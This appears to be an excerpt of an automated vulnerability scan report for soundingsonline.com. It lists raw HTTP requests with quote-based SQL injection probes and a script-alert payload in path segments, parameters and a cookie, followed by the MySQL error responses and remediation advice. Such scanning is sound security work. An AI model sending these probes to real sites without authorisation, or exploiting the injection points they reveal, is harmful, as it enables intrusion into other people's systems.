GET /news/mishaps-a-rescues'/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page= HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and-new-york-jan?tmpl=component&print=1&page=' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news/mishaps-a-rescues''/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page= HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /news/mishaps-a-rescues'/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1 Host: www.soundingsonline.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:03:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=m8vgi6a1mfd687lf7jouu8s291; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:03:22 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3' at line 1</font> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan'?tmpl=component&print=1&page= HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:45 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?tmpl=component&print=1&page=' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan''?tmpl=component&print=1&page= HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan'?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1 Host: www.soundingsonline.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:03:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=a5subqjcjob8idi2bff81gl8t2; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:03:29 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E' AND' at line 1</font> ...[SNIP]...
The count cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the count cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1 Host: www.soundingsonline.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: count=6'; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:03:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=1hojl696rbnphcmga5ld1cf013; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:03:04 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E' AND cookie' at line 1</font> ...[SNIP]...
Request 2
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1 Host: www.soundingsonline.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: count=6''; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:03:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.108. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:08 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:09 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.109. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E&1'=1 HTTP/1.1 Host: www.soundingsonline.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:03:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=m6r6k5h7dhvssd9n0b3p4vupn1; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:03:10 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E&1'=1' AND c' at line 1</font> ...[SNIP]...
The page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the page parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page=' HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:08 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?t' at line 1</font> ...[SNIP]...
Request 2
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page='' HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:09 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]...
The print parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the print parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1'&page= HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:05 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1''&page= HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:07 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]...
The tmpl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tmpl parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component'&print=1&page= HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component''&print=1&page= HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:04 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]...
1.113. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/news/mishaps-a-rescues/index.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
